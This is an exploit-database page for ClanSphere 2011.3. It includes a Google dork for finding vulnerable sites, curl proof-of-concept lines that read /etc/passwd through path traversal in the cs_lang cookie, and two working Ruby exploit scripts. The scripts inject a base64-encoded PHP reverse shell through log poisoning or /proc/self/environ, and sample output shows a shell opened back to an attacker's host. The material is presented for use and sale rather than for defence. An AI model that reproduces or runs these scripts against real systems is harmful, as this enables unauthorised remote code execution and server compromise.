0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
ClanSphere 2011.3 Local File Inclusion / Remote Code Execution Vulnerabilities
[Exploit Title: ClanSphere 2011.3 (cs_lang cookie parameter) Local File Inclusion Vulnerability
Google Dork: "Copyright 2012 Seitentitel. All rights reserved." || inurl:index.php?mod=clansphere
Date: 10/24/2012
Author: Marco Tulio ~> blkhtc0rp
Vendor Homepage: http://www.csphere.eu
Version: 2011.3
Tested on: Centos 5.7, Ubuntu 8.04 and FreeBSD 8
Description: ClanSphere version 2011.3 contains a flaw which allow an attacker to execute commands and code due its cs_lang cookie parameter that is not properly sanitized. Prior versions should also be affected.
Poc:
curl "http://www.xxx-test.eu/" -b "blah=blah; cs_lang=../../../../../../../../../../../../../../../../etc/passwd%00.png"
curl "http://www.xxx-test.eu/" -b "blah=blah; cs_lang=../../../../../../../../../../../../../../../../etc/passwd"
curl "http://www.xxx-test.eu/" -b "blah=blah; cs_lang=../../../../../../../../../../../../../../../../etc/passwd%00"
Exploit 1:
#!/usr/bin/ruby
#
# ClanSphere 2011.3 (cs_lang cookie parameter) LFI exploit by blkhtc0rp
#
#
# ./clanSphere.rb "http://172.16.255.134/apps/clansphere_2011.3/" "/var/log/httpd/access_log" 192.168.1.221 12345
# [x] ClanSphere 2011.3 LFI Exploit
# [x] Author: blkhtc0rp
# [x] Reverse shell on 192.168.1.221:12345
#
#
# nc -lp 12345
# pwd
# /var/www/html/apps/clansphere_2011.3
# id
# uid=48(apache) gid=48(apache) groups=48(apache)
#
require 'net/http'
require 'base64'
host = ARGV[0]
log = ARGV[1]
ip = ARGV[2]
rev_port = ARGV[3]
abort("Usage: #{$0} <url> <log> <your_ip> <port>") unless ARGV.size == 4
uri = URI.parse(host)
cookie = "blah=blah; cs_lang=../../../../../../../../../../../../../../../.." + log + "%00.png"
headers = { 'Cookie' => cookie,
'User-Agent' => 'Mozilla/4.0 (PSP (PlayStation Portable); 5.03)'
}
# Tiny shell from the net lol.
shell = "\$ip = \'#{ip}\';\$port = #{rev_port}; if (!(\$sock=fsockopen(\$ip,\$port))) die; while(!feof(\$sock)){ \$command = fgets(\$sock);\$pipe = popen(\$command,'r'); while (!feof(\$pipe)) fwrite (\$sock, fgets(\$pipe)); pclose(\$pipe);}fclose(\$sock);"
enc = Base64.encode64(shell).gsub("\n",'')
sh_encoded = "<?php eval(base64_decode(#{enc}));?>"
puts "[x] ClanSphere 2011.3 LFI Exploit"
puts "[x] Author: blkhtc0rp"
puts "[x] Reverse shell on #{ip}:#{rev_port}"
# Inject base64 shell
req = Net::HTTP::Get.new(sh_encoded)
status = Net::HTTP.new(uri.host, uri.port).start do |http|
http.request(req)
end
# Exec shell
req2 = Net::HTTP::Get.new(uri.path, headers)
status = Net::HTTP.new(uri.host, uri.port).start do |http|
http.request(req2)
end
Exploit 2 /proc/self/environ:
#!/usr/bin/ruby
# ClanSphere 2011.3 (cs_lang cookie parameter) LFI exploit by blkhtc0rp
# Prior versions should also be affected.
#
# ./clanSphere-poc2.rb "http://victim.com.br/" 127.0.0.1:8118 rhost.com.br 44444
# [x] ClanSphere 2011.3 (cs_lang) LFI exploit
# [x] Author: blkhtc0rp
# [x] Injecting malicious code into /proc/self/environ...
# [x] Launching reverse shell on rhost.com.br:44444...
#
# nc -vv -l 44444
# Connection from victim.com.br port 44444 [tcp/*] accepted
# id
# uid=48(apache) gid=48(apache) groups=48(apache)
#
require 'net/http'
require 'base64'
url = ARGV[0]
proxy = ARGV[1]
rhost = ARGV[2]
rport = ARGV[3]
uri = URI.parse(url)
px_addr, px_pt = proxy.split(/:/) if proxy
cookie = "blah=blah; cs_lang=../../../../../../../../../../../../../../../../proc/self/environ%00.png"
shell = "<?php \$ip = \'#{rhost}\';\$port = #{rport}; if (!(\$sock=fsockopen(\$ip,\$port))) die; while(!feof(\$sock)){ \$command = fgets(\$sock);\$pipe = popen(\$command,'r'); while (!feof(\$pipe)) fwrite (\$sock, fgets(\$pipe)); pclose(\$pipe);}fclose(\$sock);?>"
headers = { 'Cookie' => cookie,
'User-Agent' => shell
}
puts "[x] ClanSphere 2011.3 (cs_lang) LFI exploit"
puts "[x] Author: blkhtc0rp"
puts "[x] Injecting malicious code into /proc/self/environ..."
puts "[x] Launching reverse shell on #{rhost}:#{rport}..."
req = Net::HTTP::Post.new(uri.path, headers)
status = Net::HTTP.new(uri.host, uri.port, px_addr, px_pt).start do |http|
http.request(req)
end
# 0day.today [2024-11-16] #